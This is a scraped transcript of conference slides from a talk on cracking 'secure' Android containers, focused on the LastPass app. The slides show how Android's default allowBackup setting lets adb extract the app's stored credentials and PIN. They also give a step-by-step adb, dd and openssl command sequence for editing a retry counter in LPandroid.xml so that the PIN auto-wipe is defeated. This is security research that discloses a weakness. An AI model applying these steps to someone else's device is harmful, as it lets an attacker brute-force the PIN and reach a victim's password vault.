chrisjohnriley whoami it security analyst security
play

@ ChrisJohnRiley > whoami IT Security Analyst / Security - PowerPoint PPT Presentation

@ ChrisJohnRiley > whoami IT Security Analyst / Security Consultant Raiffeisen Informatik GmbH R-IT CERT Team Regular conference speaker DEF CON | Bsides | Hashdays | SecZone blog http://blog.c22.cc Abject


  1. lastpass • Personal solution (w/ enterprise option) • Uses online sync • Can be secured with a PIN • Can wipe data after 5 false logons • Restricts screenshots https://lastpass.com/android Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 69

  2. Can store lastpass.com password • So users don't need to type it EVERY time • Reduces security • Makes it usable ! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 70

  3. Why store the PW ? Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 71

  4. _ mySecur3L@sTp@$$p@$$w0rd1sDAb0mb&&&:  Easy to remember  Impossible to type! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 72

  5. It's OK though Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 73

  6. You can enable a PIN ! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 74

  7. PIN Security • Limited to 4 digits! • “ auto-Wipe ” data • after 5 false logons Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 75

  8. PIN == SECURE ! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 76

  9. AndroidManifest.xml Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 78

  10. AndroidManifest.xml <application android:allowBackup =“ true ”> Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 79

  11. Default: true Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 80

  12. adb backup com.lastpass.lpandroid – f lp.ab Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 81

  13. What good is an .ab file ? Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 82

  14. Android Backup (.ab) • zlib compressed (kinda) • skip header (24 bytes) • pipe to openssl w/zlib support dd if=dropbox.ab bs=24 skip=1 | openssl zlib -d > dropbox.tar Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 83

  15. LPandroid.xml • lastpass.com username • laspass.com password (encoded) • PIN (encoded) • Settings • ... Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 86

  16. <string name="reprompt_tries"> 0 </string> Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 87

  17. That looks interesting! Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 88

  18. ( ) THE O RY Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 89

  19. if reprompt_tries < 5 : prompt_for_pin() else drop_the_DBass() end Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 90

  20. Theory • reprompt_tries as iterator • increases till it reaches 5 • Sounds reasonable • edit the XML and restore it • Let's set “ reprompt_tries ” to -9999 then ;) Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 91

  21. Proposed Attack • Backup app data • Edit XML • set “ reprompt_tries ” to -9999 • Repackage • Restore Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 92

  22. Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 93

  23. 0 - adb backup com.lastpass.lpandroid -f lpass.ab 1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar 2 - tar -tf lpass.tar > lpass.list 3 - tar -xvf lpass.tar 4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml 5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/ 6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab 7 - openssl zlib -in lpass_new.tar >> lpass_new.ab 8 - adb restore lpass_new.ab Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 94

  24. Not the easiest process... Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 95

  25. Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 96

  26. counter++ Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 97

  27. good news … Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 98

  28. We get 10,000 tries Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 99

  29. bad news … Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 100

  30. We get 10,000 tries Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 101

  31. Let’s make it easier Mobile Fail ::: Cracking open “ secure ” Android Containers Chris John Riley | 26.11.2013 | 102

Recommend


More recommend